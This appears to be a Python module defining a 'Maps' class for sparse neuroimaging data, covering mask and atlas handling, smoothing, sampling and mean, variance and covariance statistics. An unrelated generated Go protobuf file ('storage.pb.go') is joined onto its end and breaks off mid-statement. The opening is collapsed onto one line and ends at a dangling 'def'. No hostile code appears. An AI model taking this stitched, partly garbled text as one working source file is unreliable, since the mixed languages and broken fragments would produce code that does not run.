self._Ni = other._Ni self._Nj = other._Nj self._Nk = other._Nk self._affine = other._affine self._mask = other._mask self._save_memory = other._save_memory self._atlas = other._atlas return self def __str__(self): return ( f'\nMaps object containing {self.n_m} maps.\n' f'____________Header_____________\n' f'N Nonzero : {self.maps.count_nonzero()}\n' f'N voxels : {self.n_v}\n' f'N maps : {self.n_m}\n' f'Box size : ({self.Ni}, {self.Nj}, {self.Nk})\n' f'Affine :\n{self.affine}\n' f'Has atlas : {self._has_atlas()}\n' f'Map : \n{self.maps}\n' f'Atlas Map : \n{self._maps_atlas}\n' ) @staticmethod def coord_to_id(i, j, k, Ni, Nj, Nk): return np.ravel_multi_index((i, j, k), (Ni, Nj, Nk), order='F') @staticmethod def id_to_coord(id, Ni, Nj, Nk): return np.unravel_index(id, (Ni, Nj, Nk), order='F') @staticmethod def flatten_array(array, _2D=None): shape = -1 if _2D is None else (-1, _2D) return array.reshape(shape, order='F') @staticmethod def unflatten_array(array, Ni, Nj, Nk, _4D=None): shape = (Ni, Nj, Nk) if _4D is None or _4D == 1 else (Ni, Nj, Nk, _4D) return array.reshape(shape, order='F') def _coord_to_id(self, i, j, k): return self.coord_to_id(i, j, k, self._Ni, self._Nj, self._Nk) def _id_to_coord(self, id): return self.id_to_coord(id, self._Ni, self._Nj, self._Nk) def _flatten_array(self, array, _2D=None): return self.flatten_array(array, _2D=_2D) def _unflatten_array(self, array, _4D=None): return self.unflatten_array(array, self._Ni, self._Nj, self._Nk, _4D=_4D) def _build_atlas_filter_matrix(self): if not self._has_atlas(): return atlas_data = self._flatten_array(self._atlas.data) filter_matrix = scipy.sparse.lil_matrix((self._atlas.n_labels, self.prod_N)) for k in range(self._atlas.n_labels): row = atlas_data == k filter_matrix[k, row] = 1/np.sum(row) return scipy.sparse.csr_matrix(filter_matrix) def 
    def _refresh_atlas_maps(self):
        if not self._has_atlas() or self._maps is None:
            return

        if self._atlas_filter_matrix is None:
            self._atlas_filter_matrix = self._build_atlas_filter_matrix()

        self._maps_atlas = self._atlas_filter_matrix.dot(self.maps)

    def _has_atlas(self):
        return self._atlas is not None and self._atlas.atlas is not None

    def _has_mask(self):
        return self._mask is not None and isinstance(self._mask,
                                                     nib.Nifti1Image)

    def _get_maps(self, map_id=None, atlas=False, dense=False):
        if atlas and dense:
            raise ValueError('No dense maps for atlas.')

        if map_id is None:
            if atlas:
                return self._maps_atlas
            elif dense:
                return self._maps_dense
            else:
                return self._maps
        else:
            if atlas:
                return self._maps_atlas[:, map_id]
            elif dense:
                return self._maps_dense[:, :, :, map_id]
            else:
                return self._maps[:, map_id]

    def _set_dense_maps(self):
        if self._maps is None:
            self._maps_dense = None
        else:
            self._maps_dense = Maps.unflatten_array(
                self._maps.toarray(), self._Ni, self._Nj, self._Nk,
                _4D=self.n_maps)

    def _box_dimensions_mismatch(self):
        Ni, Nj, Nk = self._Ni, self._Nj, self._Nk

        if self._maps is None:
            return False

        if Ni is not None and Nj is not None and Nk is not None and \
                self._maps is not None and Ni*Nj*Nk == self._maps.shape[0]:
            return False

        return True

    def _mask_dimensions_mismatch(self):
        if not self._has_mask():
            return False

        if (self._Ni, self._Nj, self._Nk) == self._mask.shape:
            return False

        return True

    def _atlas_dimensions_mismatch(self):
        if not self._has_atlas():
            return False

        if (self._Ni, self._Nj, self._Nk) == self._atlas.data.shape:
            return False

        return True

    def _should_verbose(self, verbose):
        if verbose is None:
            if self.verbose is None:
                return False
            return self.verbose
        return verbose

    # _____________OPERATORS_____________ #

    def __iadd__(self, val):
        self.maps += val.maps
        return self

    def __add__(self, other):
        result = copy.copy(self)
        result += other
        return result

    def __imul__(self, val):
        self.maps *= val
        return self

    def __mul__(self, val):
        result = copy.copy(self)
        result *= val
        return result

    def __rmul__(self, val):
        return self.__mul__(val)

    def __getitem__(self, key):
        return self.maps[:, key]

    # _____________DATA_TRANSFORMERS_____________ #

    @staticmethod
    def map_to_array(map, Ni, Nj, Nk):
        '''
        Convert a sparse matrix of shape (n_voxels, 1) into a dense 3D numpy
        array of shape (Ni, Nj, Nk).

        Indexing of the map is assumed to be Fortran-like (first index
        moving fastest).
        '''
        n_v, n_maps = map.shape

        if n_v != Ni*Nj*Nk:
            raise ValueError(f'Map\'s length ({n_v}) does not match given box '
                             f'({Ni}, {Nj}, {Nk}) of size {Ni*Nj*Nk}.')

        return Maps.unflatten_array(map.toarray(), Ni, Nj, Nk, _4D=n_maps)

    @staticmethod
    def array_to_map(array):
        return scipy.sparse.csr_matrix(Maps.flatten_array(array, _2D=1))

    @staticmethod
    def array_to_img(array, affine):
        '''
        Convert a dense 3D array into a nibabel Nifti1Image.
        '''
        return nib.Nifti1Image(array, affine)

    @staticmethod
    def map_to_img(map, Ni, Nj, Nk, affine):
        '''
        Convert a sparse matrix of shape (n_voxels, 1) into a nibabel
        Nifti1Image.

        Ni, Nj, Nk are the size of the box used to index the flattened map
        matrix.
        '''
        return Maps.array_to_img(Maps.map_to_array(map, Ni, Nj, Nk), affine)

    def to_array(self, map_id=None):
        '''
        Convert one map into a 3D numpy.ndarray.

        Args:
            map_id (int, optional): If int, id of the map to convert
                (3D output). If None, converts all the maps (4D output).
                Defaults to None.

        Returns:
            (numpy.ndarray) 3D array containing the chosen map information.
        '''
        maps = self._maps

        if map_id is not None:
            maps = self._maps[:, map_id]

        return self.map_to_array(maps, self._Ni, self._Nj, self._Nk)
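    # Example (illustrative sketch): maps support elementwise arithmetic
    # through the operator overloads above.
    #
    #   m1 = Maps.random(10, Ni=4, Nj=4, Nk=4, affine=np.eye(4))
    #   m2 = Maps.random(10, Ni=4, Nj=4, Nk=4, affine=np.eye(4))
    #   total = m1 + 2 * m2     # new Maps instance, m1 left unchanged
    #   total.to_array().shape  # (4, 4, 4)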
    def to_img(self, map_id=None, sequence=False, verbose=None):
        '''
        Convert one map into a nibabel.Nifti1Image.

        Args:
            map_id (int, optional): If int, id of the map to convert
                (3D output). If None, converts all the maps (4D output).
                Defaults to None.
            sequence (bool, optional): If True, convert the maps one by one
                (in parallel threads) and return a sequence of 3D images
                instead of a single image. Defaults to False.
            verbose (bool, optional): If True, print logs.

        Returns:
            (nibabel.Nifti1Image) Nifti1Image containing the chosen map
                information.
        '''
        if self._affine is None:
            raise ValueError('Must specify affine to convert maps to img.')

        verbose = self._should_verbose(verbose)

        maps = self._maps
        if map_id is not None:
            maps = self._maps[:, map_id]

        if sequence:
            n_jobs = multiprocessing.cpu_count() // 2
            splitted_range = np.array_split(range(maps.shape[1]), n_jobs)

            def to_img_pool(maps_range):
                res = []
                n_tot = len(maps_range)
                for i, k in enumerate(maps_range):
                    print_percent(i, n_tot,
                                  string='Converting {1} out of {2}... '
                                         '{0:.2f}%',
                                  verbose=verbose, rate=0, prefix='Maps')
                    res.append(self.map_to_img(maps[:, k], self._Ni,
                                               self._Nj, self._Nk,
                                               self._affine))
                return res

            return np.concatenate(
                Parallel(n_jobs=n_jobs, backend='threading')(
                    delayed(to_img_pool)(sub_array)
                    for sub_array in splitted_range))

        return self.map_to_img(maps, self._Ni, self._Nj, self._Nk,
                               self._affine)

    @staticmethod
    def _one_map_to_array_atlas(map, Ni, Nj, Nk, atlas_data, label_range):
        array = np.zeros((Ni, Nj, Nk))

        for k in label_range:
            array[atlas_data == k] = map[k, 0]

        return array

    def to_array_atlas(self, map_id=None, ignore_bg=True, bg_label=None):
        '''
        Convert one atlas map into a 3D numpy.array.

        Args:
            map_id (int, optional): If int, id of the map to convert
                (3D output). If None, converts all the maps (4D output).
                Defaults to None.
            ignore_bg (bool, optional): If True, ignore the first label of
                the atlas (background), which is set to 0 in the returned
                array.

        Returns:
            (numpy.ndarray) 3D array containing the chosen atlas map
                information.

        Raises:
            AttributeError: If no atlas has been given to this instance.
        '''
        if not self._has_atlas():
            raise AttributeError('No atlas was given.')

        label_range = self._atlas.get_labels_range(ignore_bg=ignore_bg,
                                                   bg_label=bg_label)

        if map_id is None and self.n_maps == 1:
            map_id = 0

        if map_id is None:
            array = np.zeros((self._Ni, self._Nj, self._Nk, self.n_maps))
            for k in range(self.n_maps):
                array[:, :, :, k] = self._one_map_to_array_atlas(
                    self._maps_atlas[:, k], self._Ni, self._Nj, self._Nk,
                    self._atlas.data, label_range)
        else:
            array = np.zeros((self._Ni, self._Nj, self._Nk))
            array[:, :, :] = self._one_map_to_array_atlas(
                self._maps_atlas[:, map_id], self._Ni, self._Nj, self._Nk,
                self._atlas.data, label_range)

        return array

    def to_img_atlas(self, map_id=None, ignore_bg=False):
        '''
        Convert one atlas map into a nibabel.Nifti1Image.

        Args:
            map_id (int, optional): If int, id of the map to convert
                (3D output). If None, converts all the maps (4D output).
                Defaults to None.
            ignore_bg (bool, optional): If True, ignore the first label of
                the atlas (background), which is set to 0 in the returned
                array.

        Returns:
            (nibabel.Nifti1Image) Nifti1Image containing the chosen atlas
                map information.

        Raises:
            AttributeError: If no atlas has been given to this instance.
        '''
        return self.array_to_img(
            self.to_array_atlas(map_id=map_id, ignore_bg=ignore_bg),
            self._affine)

    def _to_map_atlas(self, data):
        if isinstance(data, np.ndarray):
            data = scipy.sparse.csr_matrix(self.flatten_array(data, _2D=1))

        return self._atlas_filter_matrix.dot(data)

    def to_atlas(self, bg_label=None):
        '''
        Convert the maps into an atlas by creating a label for each distinct
        value.

        Returns:
            (nibabel.Nifti1Image) Nifti1Image containing the atlas
            () Labels of the regions
        '''
        array = self.to_array()

        if len(array.shape) == 4:
            array = np.concatenate(
                (np.zeros(array.shape[:-1] + (1,)), array), axis=3)
            array = np.argmax(array, axis=3)

        if self.n_maps == 1:
            # Atlas stored on one map
            n_labels = int(np.max(self.to_array(0))) + 1
        else:
            # Atlas stored on several maps, one label on each
            n_labels = self.n_maps

        if bg_label is not None:
            if not isinstance(bg_label, tuple) or not len(bg_label) == 2:
                raise ValueError('Background label must be a length 2 tuple '
                                 'of shape (bg_label_id, bg_label_name).')

            bg_label_id, bg_label_name = bg_label

            if bg_label_id < 0 or bg_label_id >= n_labels:
                raise ValueError('Given background index out of range. '
                                 '{0} labels detected.'.format(n_labels))

            L1 = ['r{}'.format(k) for k in range(bg_label_id)]
            L2 = [bg_label_name]
            L3 = ['r{}'.format(k) for k in range(bg_label_id+1, n_labels)]
            L = L1 + L2 + L3

        else:
            L = ['r{}'.format(k) for k in range(n_labels)]

        return {'maps': nib.Nifti1Image(array, self._affine), 'labels': L}

    # _____________PUBLIC_TOOLS_____________ #

    def apply_mask(self, mask):
        '''
        Set the contribution of every voxel outside the mask to zero.

        Args:
            mask (nibabel.Nifti1Image): Nifti1Image with 0 or 1 array.
                0: outside the mask, 1: inside.
        '''
        if not isinstance(mask, nib.Nifti1Image):
            raise ValueError('Mask must be an instance of nibabel.Nifti1Image')

        if self.maps is not None:
            mask_array = self._flatten_array(
                mask.get_fdata()).astype(self._dtype)
            filter_matrix = scipy.sparse.diags(
                mask_array, format='csr').astype(self._dtype)
            self.maps = filter_matrix.dot(self.maps)

        self._mask = mask

    def apply_atlas(self, atlas, inplace=False):
        new_maps = self if inplace else copy.copy(self)
        new_maps._atlas = Atlas(atlas)
        new_maps._atlas_filter_matrix = new_maps._build_atlas_filter_matrix()
        new_maps._refresh_atlas_maps()
        return new_maps
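    # Example (illustrative sketch): masking out every voxel outside a
    # region. Here the mask keeps only the first slice of a hypothetical
    # 4x4x4 box.
    #
    #   mask_data = np.zeros((4, 4, 4)); mask_data[0] = 1
    #   mask = nib.Nifti1Image(mask_data, np.eye(4))
    #   maps = Maps.random(50, Ni=4, Nj=4, Nk=4, affine=np.eye(4))
    #   maps.apply_mask(mask)  # contributions outside the slice are zeroed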
    def randomize(self,
                  size,
                  p=None,
                  override_mask=False,
                  inplace=False,
                  random_state=None
                  ):
        """
        Randomize the maps based on the given size.

        Args:
            size: int, size-2 tuple or 1D numpy.ndarray.
                If a 1D numpy.ndarray, creates as many maps as the array
                length and samples the given number of peaks in each map.
                Each peak has weight 1 and the weights of the peaks sampled
                on the same voxel of the same map are added.
                If a tuple (n_peaks, n_maps) is given, creates n_maps maps,
                samples n_peaks and assigns each peak to a map uniformly.
                If an int is given, equivalent to a tuple with n_maps=1.
            p (Maps instance or np.ndarray): (Optional) Probability
                distribution of the peaks over the voxels. The distribution
                may be given either by a Maps instance containing 1 map or
                by a np.ndarray of the same shape as the box of the current
                Maps instance (Ni, Nj, Nk). If None, sample uniformly
                across the box. Default: None.
            override_mask (bool): (Optional) If False, use the mask given
                when initializing the Maps object. Important: the given
                distribution p is then shrunk and re-normalized. If True,
                no mask is used and p is unchanged. Default: False.
            inplace (bool): (Optional) Performs the sampling inplace (True)
                or creates a new instance (False). Default: False.

        Returns:
            (Maps instance) Self or a copy depending on inplace.
        """
        np.random.seed(random_state)

        if self._Ni is None or self._Nj is None or self._Nk is None:
            raise ValueError('Invalid box size ({}, {}, {}).'.format(
                self._Ni, self._Nj, self._Nk))

        if isinstance(size, int):
            n_peaks, n_maps = size, 1
        elif isinstance(size, tuple):
            if len(size) != 2:
                raise ValueError('If given size is a tuple, must be of size '
                                 '2: (n_peaks, n_maps).')
            n_peaks, n_maps = size
        elif isinstance(size, np.ndarray):
            if len(size.shape) != 1:
                raise ValueError('Given size array not understood. Must be '
                                 'a 1D numpy array.')
            n_peaks, n_maps = np.sum(size), size.shape[0]
        else:
            raise ValueError('Given size not understood.')

        n_voxels = self._Ni * self._Nj * self._Nk

        if p is None:
            p = np.ones(n_voxels) / n_voxels

        elif isinstance(p, Maps):
            if p.n_maps != 1:
                raise ValueError('Maps object should contain exactly one '
                                 'map to serve as distribution. Given has '
                                 '{} maps.'.format(p.n_maps))
            p = p.maps.transpose().toarray()[0]

        elif isinstance(p, np.ndarray):
            if p.shape != (self._Ni, self._Nj, self._Nk):
                raise ValueError('Invalid numpy array to serve as a '
                                 'distribution. Should be of shape '
                                 '({}, {}, {}).'.format(
                                     self._Ni, self._Nj, self._Nk))
            p = self._flatten_array(p)

        else:
            raise ValueError('Invalid distribution p. Must be either None, '
                             'a Maps object or a numpy.ndarray.')

        if not override_mask and self._has_mask():
            mask = self._flatten_array(self._mask.get_fdata())
            p = np.ma.masked_array(p, np.logical_not(mask)).filled(0)
            p /= np.sum(p)

        maps = scipy.sparse.dok_matrix((n_voxels, n_maps))
        voxels_samples = np.random.choice(n_voxels, size=n_peaks, p=p)

        if isinstance(size, np.ndarray):
            maps_samples = np.repeat(np.arange(n_maps), repeats=size)
        else:
            maps_samples = np.random.choice(n_maps, size=n_peaks)

        for i in range(n_peaks):
            map_id = maps_samples[i]
            maps[voxels_samples[i], map_id] += 1

        maps = scipy.sparse.csr_matrix(maps)

        new_maps = self if inplace else copy.copy(self)
        new_maps.maps = maps
        return new_maps

    def normalize(self, inplace=False):
        '''
        Normalize each map separately so that each map sums to 1.

        Args:
            inplace (bool, optional): If True, performs the normalization
                inplace, else creates a new instance.

        Returns:
            (Maps) Self or a copy depending on inplace.
        '''
        diag = scipy.sparse.diags(np.power(self.n_peaks(atlas=False), -1))

        new_maps = self if inplace else copy.copy(self)
        new_maps.maps = self._maps.dot(diag)

        if self._has_atlas():
            diag_atlas = scipy.sparse.diags(
                np.power(self.n_peaks(atlas=True), -1))
            new_maps._maps_atlas = self._maps_atlas.dot(diag_atlas)

        return new_maps
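    # Example (illustrative sketch): sampling peaks and normalizing. After
    # normalize(), every map sums to 1 (given at least one peak per map).
    #
    #   maps = Maps.random((1000, 5), Ni=8, Nj=8, Nk=8, affine=np.eye(4))
    #   maps.normalize(inplace=True)
    #   maps.n_peaks()  # array of five values ~1.0 (up to float error)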
    def threshold(self, threshold, inplace=False):
        '''
        Threshold each map according to the given threshold.

        Args:
            threshold: Every value greater than or equal to the threshold
                remains unchanged, all the others are set to zero.
            inplace (bool, optional): If True, performs the thresholding
                inplace, else creates a new instance.

        Returns:
            (Maps) Self or a copy depending on inplace.
        '''
        new_maps = self if inplace else copy.copy(self)
        new_maps.maps[new_maps.maps < threshold] = 0.
        return new_maps

    @staticmethod
    def _smooth_array(array, sigma):
        return gaussian_filter(array, sigma=sigma)

    @staticmethod
    def _smooth_map(map, sigma, Ni, Nj, Nk):
        array = Maps.map_to_array(map, Ni, Nj, Nk)
        array = Maps._smooth_array(array, sigma=sigma)
        map = Maps.array_to_map(array)
        return map

    @staticmethod
    def _smooth(data, sigma, Ni=None, Nj=None, Nk=None):
        if sigma is None:
            return data

        if isinstance(data, np.ndarray):
            return Maps._smooth_array(data, sigma)

        elif scipy.sparse.issparse(data):
            return Maps._smooth_map(data, sigma, Ni, Nj, Nk)

    def smooth(self, sigma, map_id=None, inplace=False, verbose=None):
        '''
        Convolve chosen maps with a Gaussian kernel.

        Args:
            sigma (float): Standard deviation of the Gaussian kernel.
            map_id (int, optional): If None, convolves each map.
                If int, convolves only the chosen map. Defaults to None.
            inplace (bool, optional): If True, performs the smoothing
                inplace, else creates a new instance. Defaults to False.
            verbose (bool, optional): If True, print logs.
        '''
        verbose = self._should_verbose(verbose)

        if map_id is None:
            map_ids = range(self.n_maps)
        else:
            map_ids = [map_id]

        def smooth_pool(map_ids, self, sigma):
            csc_matrices = []
            n_tot = len(map_ids)
            count = 0

            for k in map_ids:
                print_percent(count, n_tot,
                              'Smoothing {1} out of {2}... {0:.1f}%',
                              rate=0, verbose=verbose, prefix='Maps')
                count += 1

                if not self.save_memory:
                    array = self._get_maps(map_id=k, dense=True)
                else:
                    array = self.to_array(k)

                array_smoothed = gaussian_filter(array, sigma=sigma)
                array_smoothed = self._flatten_array(array_smoothed, _2D=1)
                matrix = scipy.sparse.csc_matrix(array_smoothed)
                csc_matrices.append(matrix)

            return csc_matrices

        nb_jobs = multiprocessing.cpu_count() // 2
        splitted_range = np.array_split(map_ids, nb_jobs)
        csc_matrices = np.concatenate(
            Parallel(n_jobs=nb_jobs, backend='threading')(
                delayed(smooth_pool)(sub_array, self, sigma)
                for sub_array in splitted_range))

        csr_maps = scipy.sparse.hstack(csc_matrices)
        csr_maps = scipy.sparse.csr_matrix(csr_maps)

        new_maps = self if inplace else copy.copy(self)
        new_maps.maps = csr_maps
        return new_maps

    def split(self, prop=0.5, random_state=None):
        """
        Split maps randomly based on the given proportion.

        Args:
            prop (float): Proportion of maps to assign to the first set.
            random_state (int): Seed to initialize numpy.random.seed.

        Returns:
            (tuple): Size 2 tuple of Maps objects. The first contains
                approximately the given proportion of the total maps.
        """
        np.random.seed(random_state)

        maps_A = Maps.copy_header(self)
        maps_B = Maps.copy_header(self)

        n_A = np.ceil(prop * self.n_maps).astype(int)  # Nb elements in subset A

        omega = np.arange(self.n_maps)
        id_sub_maps_A = np.sort(np.random.choice(omega, n_A, replace=False))
        id_sub_maps_B = np.sort(np.delete(omega, id_sub_maps_A))

        def filter_matrix(array):
            M = scipy.sparse.lil_matrix((self.n_maps, array.shape[0]))
            for k in range(array.shape[0]):
                M[array[k], k] = 1
            return scipy.sparse.csr_matrix(M)

        filter_matrix_A = filter_matrix(id_sub_maps_A)
        filter_matrix_B = filter_matrix(id_sub_maps_B)

        maps_A.maps = self.maps.dot(filter_matrix_A)
        maps_B.maps = self.maps.dot(filter_matrix_B)

        return maps_A, maps_B
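    # Example (illustrative sketch): a random train/test split of the maps.
    #
    #   maps = Maps.random((200, 10), Ni=8, Nj=8, Nk=8, affine=np.eye(4))
    #   train, test = maps.split(prop=0.7, random_state=0)
    #   train.n_m, test.n_m  # (7, 3)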
""" np.random.seed(random_state) new_maps = self if inplace else copy.copy(self) permutation = np.random.permutation(new_maps.n_m) M = scipy.sparse.lil_matrix((new_maps.n_m, new_maps.n_m)) for k in range(new_maps.n_m): M[k, permutation[k]] = 1. M = scipy.sparse.csr_matrix(M) new_maps.maps = new_maps.maps.dot(M) return new_maps # _____________STATISTICS_____________ # def n_peaks(self, atlas=False): ''' Compute the sum of weights in each maps (equivalent to number of peaks if unit weights are 1). Args: atlas (bool, optional): If True, the atlas maps are considered. ''' return self.sum(atlas=atlas, axis=0, keepdims=True).reshape(-1) def max(self, atlas=False, **kwargs): ''' Compute the maximum. axis=None: element-wise, axis=0: maps-wise, axis=1: voxels/labels-wise. Args: atlas (bool, optional): If True, the atlas maps are considered. **kwargs: Kwargs are passed to scipy.sparse.csr_matrix.max() function. Returns: (numpy.ndarray) 2D numpy array ''' maps = self._get_maps(atlas=atlas) max = copy.copy(maps).max(**kwargs) if isinstance(max, scipy.sparse.coo.coo_matrix): max = max.toarray() return max def sum(self, atlas=False, axis=None, keepdims=False): ''' Compute the sum. axis=None: element-wise, axis=0: maps-wise, axis=1: voxels/labels-wise. Args: atlas (bool, optional): If True, the atlas maps are considered. **kwargs: Kwargs are passed to scipy.sparse.csr_matrix.sum() function. Returns: (numpy.ndarray) 2D numpy array ''' maps = self._get_maps(atlas=atlas) e1 = scipy.sparse.csr_matrix(np.ones((1, maps.shape[0]))) e2 = scipy.sparse.csr_matrix(np.ones((maps.shape[1], 1))) if axis is None or axis == 0: maps = e1.dot(maps) if axis is None or axis == 1: maps = maps.dot(e2) if axis not in [None, 0, 1]: raise ValueError('Axis must be None, 0 or 1.') return np.array(maps.toarray()) if keepdims else np.squeeze(np.array(maps.toarray())) def summed_map(self): ''' Sums all maps. Returns: (Maps) New Maps instance containing the summed map. ''' sum_map = Maps.copy_header(self) sum_map.maps = scipy.sparse.csr_matrix(self.sum(axis=1, keepdims=True)) return sum_map @staticmethod def _average(maps): ''' Computes the average map of the given maps on the second axis. maps : sparse CSR matrix of shape (n_voxels, n_maps) where n_voxels is the number of voxels in the box n_maps is the number of pmids Returns a sparse CSR matrix of shape (n_voxels, 1) representing the flattened average map. ''' _, n_maps = maps.shape e = scipy.sparse.csr_matrix(np.ones(n_maps)/n_maps).transpose() return maps.dot(e) @staticmethod def _variance(maps, bias=False): ''' Computes the variance map of the given maps on the second axis. Returns a sparse CSR matrix of shape (n_voxels, 1) representing the flattened variance map. ''' _, n_maps = maps.shape avg_map = Maps._average(maps) maps_squared = maps.multiply(maps) # Squared element wise avg_squared_map = Maps._average(maps_squared) squared_avg_map = avg_map.multiply(avg_map) var = avg_squared_map - squared_avg_map if not bias: var *= (n_maps/(n_maps-1)) return var def avg(self): ''' Computes the average map. Returns: (Maps) New Maps instance containing the average map. ''' avg_map = Maps.copy_header(self) avg_map.maps = self._average(self.maps) if self._has_atlas(): avg_map._maps_atlas = self._average(self._maps_atlas) return avg_map def var(self, bias=True): ''' Computes the variance map. Args: bias (bool, optional): If True, computes the biased variance (1/n_maps factor), else compute the unbiased variance (1/(n_maps-1) factor). 
    def var(self, bias=True):
        '''
        Compute the variance map.

        Args:
            bias (bool, optional): If True, computes the biased variance
                (1/n_maps factor), else computes the unbiased variance
                (1/(n_maps-1) factor).

        Returns:
            (Maps) New Maps instance containing the variance map.
        '''
        var_map = Maps.copy_header(self)
        var_map.maps = self._variance(self._maps, bias=bias)
        if self._has_atlas():
            var_map._maps_atlas = self._variance(self._maps_atlas, bias=bias)

        return var_map

    def cov(self, atlas=True, bias=False, shrink=None, sparse=False,
            ignore_bg=True, verbose=None):
        '''
        Compute the empirical covariance matrix of the voxels, the
        observations being the different maps.

        Important: considering the covariance between atlas labels
        (atlas=True) instead of voxels is highly recommended. Since the
        number of voxels is often huge (~1 million), the covariance matrix
        would have shape (~1 million, ~1 million) and the computation would
        probably not finish.

        Args:
            atlas (bool, optional): If True, consider the covariance between
                atlas labels. If False, covariance between voxels. Default
                is True (recommended).
            bias (bool, optional): If True, computes the biased covariance,
                else unbiased. Defaults to False.
            shrink (str, optional): Shrink the covariance matrix. If 'LW',
                the Ledoit-Wolf method is applied. Default is None.
            sparse (bool, optional): If False, converts the sparse
                covariance matrix to a dense array. Else, leaves it sparse.
                Default is False.
            ignore_bg (bool, optional): If True, ignore the first label of
                the atlas (background).

        Returns:
            (numpy.ndarray or scipy.sparse.csr_matrix) A 2D matrix (sparse
            or dense depending on the sparse parameter) of shape
            (n_voxels, n_voxels) representing the covariance matrix.
        '''
        if atlas and not self._has_atlas():
            raise ValueError('No atlas. Must specify an atlas when '
                             'initializing Maps or specify atlas=False in '
                             'the cov() function.')

        if not bias and self.n_maps <= 1:
            raise ValueError('Unbiased covariance computation requires at '
                             'least 2 maps ({} given).'.format(self.n_maps))

        verbose = self._should_verbose(verbose)
        maps = self._get_maps(atlas=atlas)
        ddof = 0 if bias else 1

        if atlas:
            labels = self._atlas.get_labels(ignore_bg=ignore_bg)
            if ignore_bg and self._atlas.has_background():
                maps[self._atlas.bg_index, :] = 0

        if verbose:
            print('Computing cov matrix')

        e1 = scipy.sparse.csr_matrix(
            np.ones(self.n_maps) / (self.n_maps - ddof)
        ).transpose().astype(self._dtype)
        e2 = scipy.sparse.csr_matrix(
            np.ones(self.n_maps) / self.n_maps
        ).transpose().astype(self._dtype)

        M1 = maps.dot(e1)
        M2 = maps.dot(e2)
        M3 = maps.dot(maps.transpose()) / (self.n_maps - ddof)

        # Empirical covariance matrix
        S = M3 - M1.dot(M2.transpose())

        del M1, M2, M3

        if not sparse:
            if verbose:
                print('To dense...')
            S = S.toarray()

        if shrink == 'LW':
            if verbose:
                print('Shrink')
            # Ledoit-Wolf shrinkage needs a dense array; the original code
            # called S.toarray() unconditionally, which fails when S has
            # already been densified above.
            if scipy.sparse.issparse(S):
                S = S.toarray()
            S = LedoitWolf().fit(S).covariance_

        return (S, labels) if atlas else S

    @staticmethod
    def _power(map, n):
        if scipy.sparse.issparse(map):
            return map.power(n)

        elif isinstance(map, np.ndarray):
            return np.power(map, n)

        else:
            raise ValueError('Given map type not supported for power: '
                             '{}'.format(type(map)))

    @staticmethod
    def _iterative_avg(k, previous_avg, new_value):
        # Running mean: avg_k = ((k-1)*avg_{k-1} + x_k) / k.
        if k == 1:
            return new_value
        return 1. / k * ((k - 1) * previous_avg + new_value)

    @staticmethod
    def _iterative_var(k, previous_var, new_avg, new_value, bias=False):
        # Welford-style running variance update based on the current mean.
        if k == 1:
            return 0 * new_value
        if bias:
            return (k - 1) / k * previous_var \
                + 1. / (k * (k - 1)) * Maps._power(new_avg - new_value, 2) \
                + 1. / k * Maps._power(new_value - new_avg, 2)
        else:
            return (k - 2) / (k - 1) * previous_var \
                + 1. / ((k - 1) ** 2) * Maps._power(new_avg - new_value, 2) \
                + 1. / (k - 1) * Maps._power(new_value - new_avg, 2)

    def iterative_smooth_avg_var(self, compute_var=True, sigma=None,
                                 bias=False, verbose=None):
        '''
        Compute the average and variance of the maps in self.maps
        iteratively, smoothing each map first if sigma is not None.
        Iterating over the maps one by one keeps memory usage low.
        '''
        verbose = self._should_verbose(verbose)

        if not compute_var:
            return self.avg().smooth(sigma=sigma), None

        avg_map = None
        var_map = None
        avg_map_atlas = None
        var_map_atlas = None

        for k in range(self.n_maps):
            print_percent(k, self.n_maps,
                          'Iterative smooth avg var {1} out of {2}... '
                          '{0:.1f}%', rate=0, verbose=verbose, prefix='Maps')

            current_map = self._get_maps(map_id=k, atlas=False,
                                         dense=not self.save_memory)
            current_map = self._smooth(current_map, sigma,
                                       self._Ni, self._Nj, self._Nk)

            avg_map = self._iterative_avg(k + 1, avg_map, current_map)
            var_map = self._iterative_var(k + 1, var_map, avg_map,
                                          current_map, bias=bias)

            if self._has_atlas():
                current_map_atlas = self._to_map_atlas(current_map)
                avg_map_atlas = self._iterative_avg(k + 1, avg_map_atlas,
                                                    current_map_atlas)
                var_map_atlas = self._iterative_var(k + 1, var_map_atlas,
                                                    avg_map_atlas,
                                                    current_map_atlas,
                                                    bias=bias)

        avg = Maps.copy_header(self)
        var = Maps.copy_header(self)

        if not self.save_memory:
            avg_map = self.array_to_map(avg_map)
            var_map = self.array_to_map(var_map)

        avg._set_maps(avg_map, refresh_atlas_maps=False)
        var._set_maps(var_map, refresh_atlas_maps=False)

        if self._has_atlas():
            avg._maps_atlas = avg_map_atlas
            var._maps_atlas = var_map_atlas

        return avg, var
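# Example (illustrative end-to-end sketch, not part of the original module):
# with no smoothing, the iterative estimators should agree with the direct
# ones up to floating-point error, assuming the recurrences above are exact.
#
#   maps = Maps.random((500, 10), Ni=8, Nj=8, Nk=8, affine=np.eye(4))
#   avg_it, var_it = maps.iterative_smooth_avg_var(sigma=None, bias=False)
#   np.allclose(avg_it.to_array(), maps.avg().to_array())            # True
#   np.allclose(var_it.to_array(), maps.var(bias=False).to_array())  # True
#   img = maps.avg().to_img()  # nibabel.Nifti1Image ready to save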
// Repo: butters-mars/definitions; file: proto/storage/storage.pb.go
// Code generated by protoc-gen-go. DO NOT EDIT. // source: storage.proto package def import ( context "context" fmt "fmt" _ "github.com/envoyproxy/protoc-gen-validate/validate" proto "github.com/golang/protobuf/proto" grpc "google.golang.org/grpc" codes "google.golang.org/grpc/codes" status "google.golang.org/grpc/status" math "math" ) // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = fmt.Errorf var _ = math.Inf // This is a compile-time assertion to ensure that this generated file // is compatible with the proto package it is being compiled against. // A compilation error at this line likely means your copy of the // proto package needs to be updated. const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package type CountType int32 const ( CountType_CountBoth CountType = 0 CountType_CountFromEnd CountType = 1 CountType_CountToEnd CountType = 2 CountType_CountNone CountType = 3 ) var CountType_name = map[int32]string{ 0: "CountBoth", 1: "CountFromEnd", 2: "CountToEnd", 3: "CountNone", } var CountType_value = map[string]int32{ "CountBoth": 0, "CountFromEnd": 1, "CountToEnd": 2, "CountNone": 3, } func (x CountType) String() string { return proto.EnumName(CountType_name, int32(x)) } func (CountType) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{0} } type State int32 const ( State_StateDeleted State = 0 State_StatePrivate State = 1 State_State1 State = 2 State_State2 State = 3 State_State3 State = 4 State_StateFriend State = 5 State_StatePublic State = 6 ) var State_name = 